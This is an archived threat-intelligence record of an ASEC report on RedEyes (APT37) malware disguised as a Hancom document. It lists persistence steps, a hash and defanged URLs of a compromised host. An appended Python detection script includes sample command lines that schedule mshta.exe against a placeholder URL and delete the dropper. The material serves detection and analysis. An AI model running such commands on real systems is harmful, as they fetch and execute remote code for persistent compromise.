{
	"id": "ba54936c-34b6-4367-82e6-20702f415496",
	"created_at": "2026-04-06T00:08:46.564881Z",
	"updated_at": "2026-04-10T03:38:06.383576Z",
	"deleted_at": null,
	"sha1_hash": "c77095adcdba92974000090726df05c7247d10e4",
	"title": "Tracking Traces of Malware Disguised as Hancom Office Document File and Being Distributed (RedEyes) - ASEC",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2386231,
	"plain_text": "Tracking Traces of Malware Disguised as Hancom Office Document File and Being Distributed (RedEyes) - ASEC\r\nBy ATCP\r\nPublished: 2023-05-24 · Archived: 2026-04-05 17:58:30 UTC\r\nAhnLab Security Emergency response Center (ASEC) has confirmed the distribution of malware disguised as a Hancom Office document file. The distributed malware is named “Who and What Threatens the World (Column).exe” and deceives users with an icon that resembles the Hancom Office icon. Extracting the compressed archive reveals a relatively large file of 36,466,238 bytes. AhnLab Endpoint Detection and Response (EDR) can detect this attack technique through its trace data, which gives users the information needed to investigate the related breach.\r\nhttps://asec.ahnlab.com/en/53377/\r\nFigure 1 depicts the icon of the malware and its overall execution flow, showing which processes are used when the malware runs.\r\nFigures 2 and 3 show the trace data of the key behaviors within that flow. In Figure 2, the malware can be seen creating a folder named onedrivenew in the AppData directory and copying itself there as onedrivenew.exe so that it looks like a normal file. In Figure 3, the malware can be seen creating and opening a benign Hancom Office document with the same file name as the malware, in the directory from which the malware was executed, as a decoy. The malicious code is then injected into and executed within the legitimate Windows process mstsc.exe, and the original file is deleted with a cmd command.\r\nFigure 4 displays the trace data of mstsc.exe running after the malware has been injected into it. The malware registers the copied file under the Run key with the value name onedrivenew so that it runs again after the system is rebooted. It then uses the schtasks.exe command to register a scheduled task named OneDriveOp that uses the legitimate Windows binary mshta.exe to connect to a specific URL every 60 minutes. The URL registered in the task appears to belong to a normal website, but the site contains a web shell. The inserted web shell has been confirmed to be similar to the one described in “Targeted Attack on a Website Developed by a Specific Web Design Company (Red Eyes and APT37)” on the AhnLab Threat Intelligence Platform.\r\nTargeted attacks involve factors that general users may struggle to deal with on their own. Even when users are exposed to such threats, AhnLab EDR can provide the trace data needed for an appropriate response.\r\n[File Detection]\r\n– Trojan/Win.Agent.R580958 (2023.05.24.02)\r\nMD5\r\n93fc0fb9b87a00b38f18c1cc4ee02e50\r\nURL\r\nhttp[:]//ingarchi[.]com/bbs/data/culture\r\nhttp[:]//ingarchi[.]com/bbs/data/culture/getcfg[.]php\r\nAdditional IOCs are available on AhnLab TIP.",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://asec.ahnlab.com/en/53377/"
	],
	"report_names": [
		"53377"
	],
	"threat_actors": [
		{
			"id": "6f30fd35-b1c9-43c4-9137-2f61cd5f031e",
			"created_at": "2025-08-07T02:03:25.082908Z",
			"updated_at": "2026-04-10T02:00:03.744649Z",
			"deleted_at": null,
			"main_name": "NICKEL FOXCROFT",
			"aliases": [
				"APT37",
				"ATK4",
				"Group 123",
				"InkySquid",
				"Moldy Pisces",
				"Operation Daybreak",
				"Operation Erebus",
				"RICOCHET CHOLLIMA",
				"Reaper",
				"ScarCruft",
				"TA-RedAnt",
				"Venus 121"
			],
			"source_name": "Secureworks:NICKEL FOXCROFT",
			"tools": [
				"Bluelight",
				"Chinotto",
				"GOLDBACKDOOR",
				"KevDroid",
				"KoSpy",
				"PoorWeb",
				"ROKRAT",
				"final1stpy"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "bbe36874-34b7-4bfb-b38b-84a00b07042e",
			"created_at": "2022-10-25T15:50:23.375277Z",
			"updated_at": "2026-04-10T02:00:05.327922Z",
			"deleted_at": null,
			"main_name": "APT37",
			"aliases": [
				"APT37",
				"InkySquid",
				"ScarCruft",
				"Group123",
				"TEMP.Reaper",
				"Ricochet Chollima"
			],
			"source_name": "MITRE:APT37",
			"tools": [
				"BLUELIGHT",
				"CORALDECK",
				"KARAE",
				"SLOWDRIFT",
				"ROKRAT",
				"SHUTTERSPEED",
				"POORAIM",
				"HAPPYWORK",
				"Final1stspy",
				"Cobalt Strike",
				"NavRAT",
				"DOGCALL",
				"WINERACK"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "552ff939-52c3-421b-b6c9-749cbc21a794",
			"created_at": "2023-01-06T13:46:38.742547Z",
			"updated_at": "2026-04-10T02:00:03.08515Z",
			"deleted_at": null,
			"main_name": "APT37",
			"aliases": [
				"Operation Daybreak",
				"Red Eyes",
				"ScarCruft",
				"G0067",
				"Group123",
				"Reaper Group",
				"Ricochet Chollima",
				"ATK4",
				"APT 37",
				"Operation Erebus",
				"Moldy Pisces",
				"APT-C-28",
				"Group 123",
				"InkySquid",
				"Venus 121"
			],
			"source_name": "MISPGALAXY:APT37",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "9b02c527-5077-489e-9a80-5d88947fddab",
			"created_at": "2022-10-25T16:07:24.103499Z",
			"updated_at": "2026-04-10T02:00:04.867181Z",
			"deleted_at": null,
			"main_name": "Reaper",
			"aliases": [
				"APT 37",
				"ATK 4",
				"Cerium",
				"Crooked Pisces",
				"G0067",
				"Geumseong121",
				"Group 123",
				"ITG10",
				"InkySquid",
				"Moldy Pisces",
				"Opal Sleet",
				"Operation Are You Happy?",
				"Operation Battle Cruiser",
				"Operation Black Banner",
				"Operation Daybreak",
				"Operation Dragon messenger",
				"Operation Erebus",
				"Operation Evil New Year",
				"Operation Evil New Year 2018",
				"Operation Fractured Block",
				"Operation Fractured Statue",
				"Operation FreeMilk",
				"Operation Golden Bird",
				"Operation Golden Time",
				"Operation High Expert",
				"Operation Holiday Wiper",
				"Operation Korean Sword",
				"Operation North Korean Human Right",
				"Operation Onezero",
				"Operation Rocket Man",
				"Operation SHROUDED#SLEEP",
				"Operation STARK#MULE",
				"Operation STIFF#BIZON",
				"Operation Spy Cloud",
				"Operation Star Cruiser",
				"Operation ToyBox Story",
				"Osmium",
				"Red Eyes",
				"Ricochet Chollima",
				"Ruby Sleet",
				"ScarCruft",
				"TA-RedAnt",
				"TEMP.Reaper",
				"Venus 121"
			],
			"source_name": "ETDA:Reaper",
			"tools": [
				"Agentemis",
				"BLUELIGHT",
				"Backdoor.APT.POORAIM",
				"CARROTBALL",
				"CARROTBAT",
				"CORALDECK",
				"Cobalt Strike",
				"CobaltStrike",
				"DOGCALL",
				"Erebus",
				"Exploit.APT.RICECURRY",
				"Final1stSpy",
				"Freenki Loader",
				"GELCAPSULE",
				"GOLDBACKDOOR",
				"GreezeBackdoor",
				"HAPPYWORK",
				"JinhoSpy",
				"KARAE",
				"KevDroid",
				"Konni",
				"MILKDROP",
				"N1stAgent",
				"NavRAT",
				"Nokki",
				"Oceansalt",
				"POORAIM",
				"PoohMilk",
				"PoohMilk Loader",
				"RICECURRY",
				"RUHAPPY",
				"RokRAT",
				"SHUTTERSPEED",
				"SLOWDRIFT",
				"SOUNDWAVE",
				"SYSCON",
				"Sanny",
				"ScarCruft",
				"StarCruft",
				"Syscon",
				"VeilShell",
				"WINERACK",
				"ZUMKONG",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434126,
	"ts_updated_at": 1775792286,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c77095adcdba92974000090726df05c7247d10e4.pdf",
		"text": "https://archive.orkl.eu/c77095adcdba92974000090726df05c7247d10e4.txt",
		"img": "https://archive.orkl.eu/c77095adcdba92974000090726df05c7247d10e4.jpg"
	}
}
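The report's plain_text describes a chain of host traces (self-copy to an AppData folder that carries the binary's own name, a decoy Hancom document sharing the dropper's file name, a Run-key value, a scheduled task that launches mshta.exe against a URL every 60 minutes, and deletion of the original file through cmd.exe). The following is an added example of detection logic over those traces; it is not ASEC code and not part of the archived report. The event field names are an assumption loosely modelled on Sysmon event IDs 1, 11 and 13, the sample events are constructed rather than real telemetry, and the exact schtasks command line, the placeholder URL and the mstsc.exe parent relationship are assumptions, since the report only names the task (OneDriveOp), the interval and mshta.exe as the launcher.

```python
"""Detection logic for the RedEyes host traces described in the ASEC report.
Added example, not ASEC code. Field names are an assumption loosely modelled
on Sysmon (1 = process create, 11 = file create, 13 = registry value set);
SAMPLE_EVENTS are constructed, not real telemetry."""
import ntpath
import re

DOC_EXTS = {".hwp", ".hwpx", ".doc", ".docx", ".pdf", ".xls", ".xlsx", ".ppt", ".pptx"}
RUN_KEY_RE = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", re.I)
TR_RE = re.compile(r'/tr\s+"([^"]*)"|/tr\s+(\S+)', re.I)          # schtasks /tr action
DEL_RE = re.compile(r'\bdel\b\s+(?:/\w+\s+)*"?([^"]+?)"?\s*$', re.I)  # cmd del <path>

DROPPER = r"C:\Users\victim\Desktop\Who and What Threatens the World (Column).exe"
COPY = r"C:\Users\victim\AppData\Roaming\onedrivenew\onedrivenew.exe"

# Constructed sample events. The schtasks command line, the placeholder URL and
# the mstsc.exe parentage are assumptions; the report only names OneDriveOp,
# the 60-minute interval and mshta.exe.
SAMPLE_EVENTS = [
    {"id": 1, "image": DROPPER, "parent": r"C:\Windows\explorer.exe", "cmdline": f'"{DROPPER}"'},
    {"id": 11, "image": DROPPER, "target": COPY},
    {"id": 11, "image": DROPPER, "target": DROPPER[:-4] + ".hwp"},
    {"id": 13, "image": COPY, "details": COPY,
     "target": r"HKU\S-1-5-21-1111111111-2222222222-3333333333-1001\Software\Microsoft\Windows\CurrentVersion\Run\onedrivenew"},
    {"id": 1, "image": r"C:\Windows\System32\schtasks.exe", "parent": r"C:\Windows\System32\mstsc.exe",
     "cmdline": 'schtasks /create /sc minute /mo 60 /tn OneDriveOp /tr "mshta.exe http://example.invalid/page" /f'},
    {"id": 1, "image": r"C:\Windows\System32\cmd.exe", "parent": r"C:\Windows\System32\mstsc.exe",
     "cmdline": f'cmd /c del "{DROPPER}"'},
    # Benign controls: an ordinary daily task and a Run value outside AppData.
    {"id": 1, "image": r"C:\Windows\System32\schtasks.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'schtasks /create /sc daily /tn NightlyBackup /tr "C:\Tools\backup.exe"'},
    {"id": 13, "image": r"C:\Program Files\Vendor\setup.exe", "details": r"C:\Program Files\Vendor\updater.exe",
     "target": r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\VendorUpdater"},
]


def _base(p):
    return ntpath.basename(p).lower()


def _stem(p):
    return ntpath.splitext(ntpath.basename(p))[0].lower()


def _in_appdata(p):
    return "\\appdata\\" in p.lower()


def rule_self_copy_appdata(ev, seen):
    """Executable written under AppData into a folder named after itself (onedrivenew\\onedrivenew.exe)
    by a process that itself runs from outside AppData."""
    if ev["id"] != 11:
        return False
    t = ev["target"]
    if not _in_appdata(t) or not t.lower().endswith(".exe"):
        return False
    return _base(ntpath.dirname(t)) == _stem(t) and not _in_appdata(ev["image"])


def rule_decoy_same_name(ev, seen):
    """Executable dropping a document that shares its own file name in its own directory."""
    if ev["id"] != 11 or not ev["image"].lower().endswith(".exe"):
        return False
    t = ev["target"]
    return (ntpath.splitext(t)[1].lower() in DOC_EXTS and _stem(t) == _stem(ev["image"])
            and ntpath.dirname(t).lower() == ntpath.dirname(ev["image"]).lower())


def rule_run_key_to_appdata(ev, seen):
    """Run-key value whose data points into a user's AppData tree."""
    return ev["id"] == 13 and RUN_KEY_RE.search(ev["target"]) is not None and _in_appdata(ev.get("details", ""))


def rule_schtasks_mshta_url(ev, seen):
    """schtasks.exe creating a task whose action runs mshta.exe against an http(s) URL."""
    if ev["id"] != 1 or _base(ev["image"]) != "schtasks.exe":
        return False
    cmd = ev.get("cmdline", "")
    m = TR_RE.search(cmd)
    if not re.search(r"/create\b", cmd, re.I) or not m:
        return False
    action = (m.group(1) if m.group(1) is not None else m.group(2)).lower()
    return "mshta" in action and re.search(r"https?://", action) is not None


def rule_cmd_deletes_seen_exe(ev, seen):
    """cmd.exe deleting a file that earlier ran as a process (dropper self-deletion)."""
    if ev["id"] != 1 or _base(ev["image"]) != "cmd.exe":
        return False
    m = DEL_RE.search(ev.get("cmdline", ""))
    return m is not None and m.group(1).lower() in seen


def rule_mstsc_spawns_shell(ev, seen):
    """mstsc.exe, the injection host named in the report, acting as parent of cmd.exe or schtasks.exe."""
    return ev["id"] == 1 and _base(ev.get("parent", "")) == "mstsc.exe" and _base(ev["image"]) in {"cmd.exe", "schtasks.exe"}


RULES = [rule_self_copy_appdata, rule_decoy_same_name, rule_run_key_to_appdata,
         rule_schtasks_mshta_url, rule_cmd_deletes_seen_exe, rule_mstsc_spawns_shell]


def detect(events):
    """Return (rule_name, event_index) pairs; 'seen' is every image that ran as a process."""
    seen = {e["image"].lower() for e in events if e["id"] == 1}
    return [(r.__name__[5:], i) for i, ev in enumerate(events) for r in RULES if r(ev, seen)]


if __name__ == "__main__":
    for name, idx in detect(SAMPLE_EVENTS):
        print(f"{name:22} event {idx}: {SAMPLE_EVENTS[idx]}")
```

Run stand-alone, the script flags the six malicious events and neither benign control. Each rule is deliberately behavioural rather than keyed to the names onedrivenew or OneDriveOp, so a renamed sample that keeps the same layout (self-copy into a folder named after the binary, decoy document with the dropper's name, Run value into AppData, mshta.exe task pointed at a URL, cmd.exe deleting a previously executed binary) still matches; the self-deletion rule needs the process-create events to be correlated with the later cmd.exe command line, which is why detect() builds the set of executed images first.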